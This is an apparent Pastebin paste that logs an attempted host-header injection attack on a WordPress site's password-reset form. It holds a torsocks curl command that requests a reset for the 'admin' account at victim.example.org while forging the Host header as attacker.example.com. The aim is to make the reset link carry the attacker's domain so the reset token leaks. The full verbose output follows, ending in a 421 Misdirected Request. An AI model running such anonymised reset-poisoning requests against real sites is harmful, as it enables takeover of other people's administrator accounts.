Public Pastes
daily pastebin goal
4%
SHARE
TWEET

Untitled

a guest May 6th, 2017 83 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. torsocks curl -v -H "Host: attacker.example.com" https://victim.example.org/wp-login.php?action=lostpassword -d "user_login=admin&redirect_to=&wp-submit=Get+New+Password"
  2.  
  3. *   Trying 1.2.3.4 ...
  4. * TCP_NODELAY set
  5. * Connected to victim.example.org (1.2.3.4) port 443 (#0)
  6. * ALPN, offering h2
  7. * ALPN, offering http/1.1
  8. * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
  9. * successfully set certificate verify locations:
  10. *   CAfile: /etc/ssl/certs/ca-certificates.crt
  11.   CApath: /etc/ssl/certs
  12. * TLSv1.2 (OUT), TLS header, Certificate Status (22):
  13. * TLSv1.2 (OUT), TLS handshake, Client hello (1):
  14. * TLSv1.2 (IN), TLS handshake, Server hello (2):
  15. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  16. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  17. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  18. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  19. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  20. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  21. * TLSv1.2 (IN), TLS change cipher, Client hello (1):
  22. * TLSv1.2 (IN), TLS handshake, Finished (20):
  23. * SSL connection using TLSv1.2 / ECDHE-ECDSA-AES128-GCM-SHA256
  24. * ALPN, server accepted to use http/1.1
  25. * Server certificate:
  26. *  subject: CN=hostingco.example.net
  27. *  start date: May  5 11:57:00 2017 GMT
  28. *  expire date: Aug  3 11:57:00 2017 GMT
  29. *  subjectAltName: host "victim.example.org" matched cert's "victim.example.org"
  30. *  issuer: C=US; O=Let's Encrypt; CN=Let's Encrypt Authority X3
  31. *  SSL certificate verify ok.
  32. > POST /wp-login.php?action=lostpassword HTTP/1.1
  33. > Host: attacker.example.com
  34. > User-Agent: curl/7.52.1
  35. > Accept: */*
  36. > Content-Length: 56
  37. > Content-Type: application/x-www-form-urlencoded
  38. >
  39. * upload completely sent off: 56 out of 56 bytes
  40. < HTTP/1.1 421 Misdirected Request
  41. < Date: Sat, 06 May 2017 10:08:21 GMT
  42. < Server: Apache/2.4.25 (Debian)
  43. < Content-Length: 412
  44. < Content-Type: text/html; charset=iso-8859-1
  45. <
  46. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  47. <html><head>
  48. <title>421 Misdirected Request</title>
  49. </head><body>
  50. <h1>Misdirected Request</h1>
  51. <p>The client needs a new connection for this
  52. request as the requested host name does not match
  53. the Server Name Indication (SNI) in use for this
  54. connection.</p>
  55. <hr>
  56. <address>Apache/2.4.25 (Debian) Server at attacker.example.com Port 443</address>
  57. </body></html>
  58. * Curl_http_done: called premature == 0
  59. * Connection #0 to host victim.example.org left intact
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Pastebin PRO 'SUMMER SPECIAL'!
Get 60% OFF Pastebin PRO accounts!
 
Top